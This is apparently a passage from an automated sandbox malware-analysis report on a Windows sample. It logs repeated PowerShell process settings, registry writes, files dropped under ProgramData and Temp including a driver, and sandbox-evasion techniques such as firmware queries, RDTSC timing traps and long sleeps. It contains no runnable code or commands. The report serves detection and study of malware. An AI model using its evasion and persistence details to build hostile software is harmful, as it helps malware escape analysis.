                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\svchost.exe | Code function: 4_2_000001C3DDDB8830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,4_2_000001C3DDDB8830
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\{42F09F7D-CA44-409E-A936-E948CF4ECA66} {875376CD-1334-41AA-8A36-0C7105D31883}
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe System information queried: FirmwareTableInformation
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe System information queried: FirmwareTableInformation
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe System information queried: FirmwareTableInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 568EE8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 556BCB
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 591361
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 67CAB8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 58FA69
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 67E513
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 552C88
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 56F297
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 56043A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 6542B5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API/Special instruction interceptor: Address: 7FF9105CE814
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe Special instruction interceptor: First address: 64C48F instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Special instruction interceptor: First address: 140422224 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe Special instruction interceptor: First address: 1402AC77B instructions rdtsc caused by: RDTSC with Trap Flag (TF)
                    Source: C:\Windows\System32\svchost.exe Code function: 4_2_000001C3DDDBDE00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,4_2_000001C3DDDBDE00
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6098
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3681
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7171
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2462
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5622
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2190
                    Source: C:\Windows\System32\svchost.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_4-17596
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe Dropped PE file which has not been started: C:\Windows\Temp\bS4Vs_8188.sys
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-12319
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe API coverage: 6.1 %
                    Source: C:\Windows\System32\svchost.exe API coverage: 7.5 %
                    Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep count: 46 > 30
                    Source: C:\Windows\System32\svchost.exe TID: 7828 Thread sleep time: -138000s >= -30000s
                    Source: C:\Windows\System32\svchost.exe TID: 7840 Thread sleep time: -90000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884 Thread sleep count: 6098 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872 Thread sleep count: 3681 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588 Thread sleep time: -9223372036854770s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7688 Thread sleep count: 5622 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788 Thread sleep count: 2190 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2288 Thread sleep time: -922337203685477s >= -30000s
